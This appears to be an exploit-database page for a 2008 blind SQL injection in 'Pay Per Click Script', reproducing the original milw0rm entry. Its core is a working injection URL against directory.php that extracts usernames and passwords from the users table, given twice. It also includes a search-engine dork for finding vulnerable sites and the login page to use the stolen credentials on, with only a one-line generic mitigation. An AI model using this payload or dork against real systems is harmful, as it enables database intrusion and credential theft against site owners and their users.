header-logo
Suggest Exploit
vendor:
Pay Per Click Script
by:
Hamtaro aka CorVu5
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Pay Per Click Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Blind SQL Injection Vulnerability in Pay Per Click Script

A Blind SQL Injection vulnerability was found in Pay Per Click Script powered by SmartPPC.com. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server with the payload 'site.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108' which can be used to extract sensitive information from the database.

Mitigation:

Input validation and sanitization should be used to prevent SQL Injection attacks.
Source

Exploit-DB raw data:

+---------------------------------------+
|   Blind SQL Injection Vulnerability   |
|      in  Pay Per Click Script         |
|     found by Hamtaro aka CorVu5       |
|there must be 50 ways to learn to hover|
+---------------------------------------+
 
#gdork: "Pay Per Click Script powered by SmartPPC.com."
 
#vuln: site.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108
 
#login: site.com/accounts.php
---------------------------------------
greetz Hamtaro aka CorVu5

# milw0rm.com [2008-07-07]